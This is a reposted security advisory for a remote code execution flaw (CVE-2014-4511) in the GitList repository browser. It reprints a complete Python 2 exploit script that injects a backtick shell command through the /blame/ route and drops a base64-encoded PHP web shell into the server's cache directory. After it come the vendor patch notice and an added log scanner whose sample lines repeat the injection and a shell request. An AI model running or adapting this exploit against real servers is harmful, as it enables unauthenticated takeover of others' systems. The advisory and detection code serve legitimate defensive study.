西域孤鸿 posted on 2014-7-3 10:05:26

GitList Remote Code Execution Vulnerability (CVE-2014-4511)

<p>Affected systems:<br />GitList &lt;= 0.4.0 (fixed in 0.5.0)<br />Description:<br />--------------------------------------------------------------------------------<br />BUGTRAQ ID: 68253<br />CVE(CAN) ID: CVE-2014-4511<br /><br />GitList is an open-source git repository browser written in PHP.<br /><br />GitList 0.4.0 and earlier contain a remote code execution vulnerability that is a shell command injection: the file-path segment of a repository route such as /blame/master/&lt;file&gt; is handed to git through the shell without being escaped, so shell metacharacters placed there (the exploit below uses backticks) are evaluated and the embedded command runs on the server as the web-server user. No authentication is needed. The exploit does not need to see command output: it writes a one-line PHP web shell into GitList's cache directory, which the web server then serves, and the request itself ends in an HTTP 500 because git fails on the bogus file name after the injected command has already run.<br /><br />Source: drone<br />Test method:<br />--------------------------------------------------------------------------------</p>
<p>Warning</p>
<p>The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!</p>
<p><br><div class="msgheader">The code is as follows:</div><div class="msgborder" id="phpcode33"><br />
# Python 2 script: it uses the commands module and urllib.quote, both of<br />
# which were removed in Python 3, so run it with a Python 2 interpreter.<br />
from commands import getoutput<br />
import urllib<br />
import sys<br />
<br />
"""<br />
Exploit Title: Gitlist &lt;= 0.4.0 anonymous RCE<br />
Date: 06/20/2014<br />
Author: drone (@dronesec)<br />
Vendor Homepage: http://gitlist.org/<br />
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz<br />
Version: &lt;= 0.4.0<br />
Fixed in: 0.5.0<br />
Tested on: Debian 7<br />
More information: http://hatriot.github.io/blog/2014/06/29/gitlist-rce/<br />
cve: CVE-2014-4511<br />
"""<br />
<br />
if len(sys.argv) &lt;= 1:<br />
    print '%s: [url] {cache path}' % sys.argv[0]<br />
    print 'Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]<br />
    print 'Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]<br />
    sys.exit(1)<br />
<br />
# repository URL; drop a trailing slash so the route path joins cleanly<br />
url = sys.argv[1]<br />
url = url if url[-1] != '/' else url[:-1]<br />
<br />
# absolute path of GitList's cache directory on the target: it must be<br />
# writable by the web server and served back by it<br />
path = "/var/www/gitlist/cache"<br />
if len(sys.argv) &gt; 2:<br />
    path = sys.argv[2]<br />
<br />
print '[!] Using cache location %s' % path<br />
<br />
# payload &lt;?system($_GET['cmd']);?&gt;, base64-encoded so it survives the shell<br />
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="<br />
<br />
# sploit: the file-path part of the /blame/ route reaches the shell unescaped,<br />
# so the backtick command runs and writes x.php into the cache directory;<br />
# python requests does not like this URL, hence wget is used<br />
mpath = '/blame/master/""`echo {0}|base64 -d &gt; {1}/x.php`'.format(payload, path)<br />
mpath = url + urllib.quote(mpath)<br />
<br />
# git blame fails on the bogus file name and GitList answers 500, but by then<br />
# the injected command has already run, so a 500 is the success signal here<br />
out = getoutput("wget %s" % mpath)<br />
if '500' in out:<br />
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]<br />
else:<br />
    print '[-] Failed to drop'<br />
    print out<br />
</div></p>
<p>Recommendation:<br />--------------------------------------------------------------------------------<br />Vendor patch:<br /><br />GitList<br />-------<br />The vendor has released an upgrade (0.5.0) that fixes this issue; download it from the vendor's homepage:<br /><br />http://gitlist.org/</p>
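<p>A defensive counterpart to the exploit above, added here as an example; it is not part of the original advisory, of drone's script, or of GitList itself. It scans web-server access-log lines for GitList route paths (/blame/, /tree/, /raw/, /blob/, /commits/, an assumed set of routes) whose file-path segment contains shell metacharacters, decodes any base64 blob the request pipes through base64 -d, records where the injected command wrote its file, and notes whether the request got the HTTP 500 the exploit treats as success. The three log lines, the IP address, timestamps and byte counts are constructed for the example. The script is Python 3.</p>

```python
# Added example for this advisory; it is not part of drone's exploit or of
# GitList. It shows the responder's side of CVE-2014-4511: find GitList
# requests whose file-path segment carries shell metacharacters in a web-server
# access log, decode the base64 blob the exploit pipes through `base64 -d`,
# and report where the resulting file was written. Runs on Python 3.
import base64
import re
from urllib.parse import unquote

# Constructed combined-format log lines, not real traffic. The second line is
# the exploit's /blame/master/""`...` path exactly as urllib.quote() encodes it.
SAMPLE_LOG_LINES = [
    '203.0.113.5 - - [03/Jul/2014:10:05:26 +0800] "GET /gitlist/my_repo.git/blame/master/README.md HTTP/1.1" 200 4127 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [03/Jul/2014:10:05:31 +0800] "GET /gitlist/my_repo.git/blame/master/%22%22%60echo%20PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo%3D%7Cbase64%20-d%20%3E%20/var/www/gitlist/cache/x.php%60 HTTP/1.1" 500 1623 "-" "Wget/1.13.4 (linux-gnu)"',
    '203.0.113.5 - - [03/Jul/2014:10:05:40 +0800] "GET /gitlist/cache/x.php?cmd=ls HTTP/1.1" 200 312 "-" "Mozilla/5.0"',
]

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
# GitList routes whose trailing segment is a file path handed to git
# (assumed set; adjust to the routes your GitList version exposes).
GITLIST_ROUTE = re.compile(r'/(?:blame|tree|raw|blob|commits)/')
# Characters a POSIX shell interprets inside an unquoted argument.
SHELL_META = re.compile(r'[`$|;]')
# The `echo <base64>|base64 -d > <file>` idiom the exploit uses.
B64_PIPE = re.compile(r'echo\s+([A-Za-z0-9+/=]+)\s*\|\s*base64\s+-d')
DROP_TARGET = re.compile(r'>\s*([^\s`]+)')


def decode_echoed_base64(cmd):
    """Decode every `echo <b64>|base64 -d` in cmd; skip blobs that are not valid base64."""
    decoded = []
    for blob in B64_PIPE.findall(cmd):
        try:
            decoded.append(base64.b64decode(blob, validate=True).decode('utf-8', 'replace'))
        except ValueError:          # binascii.Error is a ValueError subclass
            continue
    return decoded


def scan_access_log(lines):
    """Return one finding per GitList request whose path segment looks like command injection."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        path = unquote(m.group('path'))       # decode %60 -> ` etc. before inspecting
        route = GITLIST_ROUTE.search(path)
        if not route:
            continue
        tail = path[route.end():]             # the part GitList hands to git
        if not SHELL_META.search(tail):
            continue
        target = DROP_TARGET.search(tail)
        findings.append({
            'ip': m.group('ip'),
            'time': m.group('ts'),
            'status': int(m.group('status')),
            'injected': tail,
            'decoded_payloads': decode_echoed_base64(tail),
            'written_to': target.group(1) if target else None,
            # The exploit treats a 500 as success: git fails on the bogus
            # filename, but the shell has already evaluated the backticks.
            'likely_executed': m.group('status') == '500',
        })
    return findings


if __name__ == '__main__':
    for f in scan_access_log(SAMPLE_LOG_LINES):
        print(f"{f['time']} {f['ip']} status={f['status']} likely_executed={f['likely_executed']}")
        print("  injected path :", f['injected'])
        for payload in f['decoded_payloads']:
            print("  decoded blob  :", payload.rstrip())
        if f['written_to']:
            print("  written to    :", f['written_to'])
```

<p>Feed it real log lines with <code>scan_access_log(open('access.log').readlines())</code>. The metacharacter check is deliberately broad and will also flag legitimate file names that contain <code>$</code> or <code>;</code>; treat a hit as something to look at, and treat a hit with a 500 response followed by requests to the cache directory, as in the third sample line, as a probable compromise. Because the decoded payload is whatever the attacker chose, the base64 decoder tolerates invalid or non-UTF-8 blobs instead of raising.</p>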